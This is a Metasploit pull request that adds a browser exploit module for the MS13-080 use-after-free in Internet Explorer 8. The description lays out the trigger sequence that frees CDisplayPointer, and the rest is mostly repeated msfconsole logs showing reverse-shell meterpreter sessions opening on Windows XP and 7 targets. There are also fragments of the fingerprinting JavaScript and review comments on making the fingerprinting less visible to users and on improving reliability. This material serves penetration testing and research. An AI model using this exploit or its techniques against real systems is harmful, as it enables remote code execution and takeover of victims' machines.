Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free #2510

Merged
merged 4 commits into from Oct 13, 2013

Conversation

wchen-r7
Contributor

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release.

This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to set up for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unselect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

The module has been tested against the following setups:

  • IE 8 + Win 7 + Office 2007
  • IE 8 + Win 7 + Office 2010
  • IE 8 + Win 7 + JRE6
  • IE 8 + Win XP

Demo for setup 1 (IE8 + Win 7 + Office 2007):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/iUz9VHP
[*]  Local IP: http://10.0.1.76:8080/iUz9VHP
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.9         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.9         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with office2007 DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.9
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.9:49347) at 2013-10-12 13:07:30 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.9:49347) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2284)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2488
[+] Successfully migrated to process 

Demo for setup 2 (IE 8 + Win 7 + Office 2010):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/quUXPn5IL93M2
[*]  Local IP: http://10.0.1.76:8080/quUXPn5IL93M2
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.6         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.6         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with office2010 DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.6:49413) at 2013-10-12 13:11:17 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.6:49413) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2172)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1780
[+] Successfully migrated to process 

Demo for setup 3 (IE 8 + Win 7 + JRE6):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/y8nZkCMlypRYfEg
[*]  Local IP: http://10.0.1.76:8080/y8nZkCMlypRYfEg
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) >
[*] 10.0.1.9         ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.9         ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.9
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.9:49160) at 2013-10-12 13:18:51 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.9:49160) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (516)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2612
[+] Successfully migrated to process

Demo for setup 4 (IE8 + XP):

$ msfconsole -q
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/zi5zhThzD19o8qH
[*]  Local IP: http://10.0.1.76:8080/zi5zhThzD19o8qH
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 10.0.1.76        ms13_080_cdisplaypointer - Checking out target...
[*] 10.0.1.76        ms13_080_cdisplaypointer - Target uses Microsoft Windows XP MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:59265) at 2013-10-12 13:20:23 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.76:59265) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2708)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 608
[+] Successfully migrated to process

return os_string;
}

function dll() {
Contributor

This could be part of a mixin as presumably this javascript would be used for all exploits using hxds?

Contributor Author

Yeah, it will be. I recently obtained multiple versions of Office so I'll be looking into that. Ticket:
http://dev.metasploit.com/redmine/issues/8413

@Meatballs1
Contributor

Works IE 8 Win7 JRE.

Will check XP but only have Office 2k13...

@wchen-r7
Contributor Author

Thanks for testing. If you're on XP, then it will only use the msvcrt ROP.

@Meatballs1
Contributor

I was referring to the Win7 targets using Office

@wchen-r7
Contributor Author

Ah ok. Well no worries there, can let Juan test the rest :-)

@Meatballs1
Contributor

Defaults (JRE/MSVCRT) works fine for Win7/WinXP.

N.B. Not always reliable if you try and run it again on an already exploited box (even restarting IE): it crashes the tab, but generally works when the tab auto-restarts.

[*] 192.168.1.13     ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.1.13     ms13_080_cdisplaypointer - Target uses Microsoft Windows XP MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 192.168.1.13
[*] Meterpreter session 2 opened (192.168.1.121:4444 -> 192.168.1.13:1061) at 2013-10-12 21:43:58 +0100
[*] Session ID 2 (192.168.1.121:4444 -> 192.168.1.13:1061) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2192)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2700
[+] Successfully migrated to process 
msf exploit(ms13_080_cdisplaypointer) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : XPPROSP2
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_GB
Meterpreter     : x86/win32

[*] 192.168.1.14     ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.1.14     ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with default DLL... engaging.
[*] Sending stage (770048 bytes) to 192.168.1.14
[*] Meterpreter session 6 opened (192.168.1.121:4444 -> 192.168.1.14:49321) at 2013-10-12 21:48:13 +0100
[*] Session ID 6 (192.168.1.121:4444 -> 192.168.1.14:49321) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2968
[+] Successfully migrated to process 
sessions -i 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer        : IE8WIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

}

window.onload = function() {
window.location = "#{get_resource}/search?o=" + os() + "&d=" + dll();
Contributor

Should really use XMLHttpRequest to POST the data back, or at least encode the data so it's not quite so obvious to the user ;)

Contributor Author

Tried, actually. Made the exploit less stable, not sure why.

Contributor

Then perhaps just encode the query params or assign random strings to identify the dlls/os's in the framework/javascript?

Contributor Author

I'll do random strings, thanks for the suggestion. Doesn't look like we offer any javascript code for encoding or hashing in Metasploit :-/

@wchen-r7
Contributor Author

How's your WinDBG-fu? If you can capture one of the failed attempts, .dump the crash and e-mail to me, perhaps I can figure out why.


def get_sploit_html(cli, target_info)
os = target_info[:os]
dll = target_info[:dll]
Contributor

I think dll isn't used in this function, is it? Can it be deleted?

@jvazquez-r7
Contributor

  • Tested successfully on WIN7 / IE8 / Office 2010:
msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/7HD3h2ySY81d
[*]  Local IP: http://192.168.0.3:8080/7HD3h2ySY81d
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 192.168.0.3      ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.0.3      ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with Office 2010 DLL
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:62668) at 2013-10-12 17:12:50 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:62668) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3464)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3864
[+] Successfully migrated to process 

msf exploit(ms13_080_cdisplaypointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Just giving some time in case @Meatballs1 / @wchen-r7 would like to handle the issues experienced by @Meatballs1

@Meatballs1
Contributor

I have sent a crash dump to @wchen-r7's rapid7 address, but it seemed reliable on first exploitation so probably good to land.

When I got debugging tools installed it got really reliable when I was trying to get a crash dump..!

@wchen-r7
Contributor Author

Juan - so I looked at the crash dump. As far as I could tell, the crash was properly controlled and redirected to the target address. The payload at the target address was fully decoded. Hard to tell what happens after that, because the dump doesn't show me a crash (it's at ntdll!DbgBreakPoint). I can only assume the payload failed for some reason in that particular case, I don't know why. We know typically this is either:

  • Due to a bad heap handle. I could use PrependMigrate to HOPEFULLY overcome this if this is the case.
  • That corruption during post-exploitation that's been forcing us to add rand_text_alpha(12000) at the end of the payload.

One way I know to determine which one is we kinda need to know whether Ben hit the failure before or after seeing the "Sending stage..." message in msfconsole. If he saw the message, that probably means the second. If not, I guess it's the first.

@jvazquez-r7
Contributor

Okay, in this case, just testing the Office 2007 case and landing!!

@jvazquez-r7
Contributor

Office 2007 rop case also working:

msf > use exploit/windows/browser/ms13_080_cdisplaypointer 
msf exploit(ms13_080_cdisplaypointer) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/sj8PFRkMH9WABa
[*]  Local IP: http://192.168.0.3:8080/sj8PFRkMH9WABa
[*] Server started.
msf exploit(ms13_080_cdisplaypointer) > [*] 192.168.0.3      ms13_080_cdisplaypointer - Checking out target...
[*] 192.168.0.3      ms13_080_cdisplaypointer - Target uses Microsoft Windows 7 MSIE 8.0 with Office 2007 DLL
[*] Sending stage (770048 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51593) at 2013-10-12 20:04:36 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51593) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2196)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1696

msf exploit(ms13_080_cdisplaypointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > [+] Successfully migrated to process 
sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

landing!

jvazquez-r7 pushed a commit that referenced this pull request Oct 13, 2013
@jvazquez-r7 jvazquez-r7 merged commit 9725918 into rapid7:master Oct 13, 2013
@wchen-r7
Contributor Author

Thanks for testing, guys.
